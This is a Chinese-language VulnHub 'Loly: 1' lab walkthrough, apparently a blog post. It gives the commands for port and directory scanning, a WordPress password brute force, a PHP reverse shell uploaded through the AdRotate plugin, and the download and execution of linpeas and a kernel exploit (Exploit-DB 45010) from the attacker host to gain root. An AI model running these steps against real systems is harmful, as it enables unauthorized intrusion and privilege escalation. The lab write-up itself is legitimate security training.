vulnhub Loly: 1

渗透思路:

nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan爆破wordpress用户名和密码 ---- 利用wordpress AdRotate文件上传功能getshell ---- 利用内核漏洞提权(eBPF_verifier)

环境信息:

靶机:192.168.101.102

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.102

只扫描到80端口,看来只能通过webshell的方式进入靶机了

2、gobuster扫描网站目录

gobuster dir -u http://192.168.101.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到/wordpress

3、wpscan爆破wordpress用户名和密码

首先用wpscan枚举wordpress用户名,发现用户名loly

wpscan --url http://192.168.101.102/wordpress -e

接着用wpscan爆破loly的密码,得到fernando

wpscan --url http://192.168.101.102/wordpress -U loly -P "rockyou.txt"

4、利用wordpress AdRotate文件上传功能getshell

浏览器访问http://192.168.101.102/wordpress/wp-login.php,发现无法访问,并有如下提示

根据提示可以判断靶机wordpress对应的域名是loly.lc,因此需要修改/etc/hosts文件,增加靶机ip地址和loly.lc的对应关系

sudo vim /etc/hosts

修改好/etc/hosts之后,wordpress的login页面可以正常访问

以用户名loly,密码fernando登录后,会出现确认网站管理邮箱的页面,点The email is correct就行

进入管理页面后,一通搜索有没有改模版或者上传文件的地方,最后发现AdRotate的Manage Media中有一个上传文件的地方。

将kali上的/usr/share/webshells/php/php-reverse-shell.php中的$ip和$port分别修改为攻击机ip和攻击机监听的tcp端口,然后压缩为phpshell.zip文件,然后在该页面上传

在AdRotate的Settings中可以找到文件上传的位置

攻击机上监听8888端口

nc -nlvp 8888

浏览器访问http://loly.lc/wordpress/wp-content/banners/phpshell.php

可以得到www-data的反弹shell,再执行如下命令得到交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

5、利用内核漏洞提权(eBPF_verifier)

查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为

lolyisabeautifulgirl

尝试访问数据库发现没什么有价值的信息,来到/home目录下发现本地有一个用户loly,联想到刚刚发现的数据库密码和loly有关,怀疑loly的系统密码可能也是lolyisabeautifulgirl

切换用户到loly

su - loly

loly家目录下有个cleanup.py文件

该文件内容是删除/tmp目录,看起来有点像定时任务,于是写了个python反弹shell进去,但是等了半天没反应

只能请linpeas.sh出马,在攻击机上起http服务

python2 -m SimpleHTTPServer 80

靶机上下载并执行linpeas.sh

wget http://192.168.101.34/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

linpeas执行后给出几条可能性很高的内核漏洞利用建议,第一条就是下图这个eBPF_verifier

exp的下载地址为https://www.exploit-db.com/download/45010

先将exp下载到攻击机上,然后靶机从攻击机下载、编译、并执行exp,得到root权限

wget http://192.168.101.34/45010.c && gcc -o exp 45010.c && chmod +x exp && ./exp

在/root下找到root.txt

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值